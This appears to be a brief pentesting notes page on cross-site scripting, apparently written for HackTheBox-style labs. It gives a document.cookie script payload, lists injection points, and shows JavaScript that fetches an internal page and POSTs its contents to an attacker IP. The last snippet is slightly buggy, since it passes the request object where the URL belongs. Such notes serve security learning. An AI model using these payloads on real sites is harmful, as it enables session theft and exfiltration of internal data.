XSS
Cross-Site Scripting is a web attack in which the attacker might be able to inject the malicious javascript code for the benefit of the attacker
Stealing cookies of the current user
<script>alert(document.cookie)</script>
Places to check for XSS
All fields in the form submission
User-Agent
Referrer Headers
XSS to CSRF
Create requests with
XMLHTTPRequest()
to request a webpage
var url1 = "http://internal.dnoscp.htb";
var req1 = new XMLHttpRequest();
req1.open("GET", url1, false); // open(<request method>, <target url>, <go to next withoput completing this line>)
req1.send();
var resp1 = req1.responseText;
With the content of the requested webpage stored in the variable resp1, it can be sent to the attacker with another request from js to the attacker machine
var url2 = "http://10.10.10.10";
var req2 = new XMLHttpRequest();
req2.open("POST", req2, false);
req2.send(resp1);
Last updated
Was this helpful?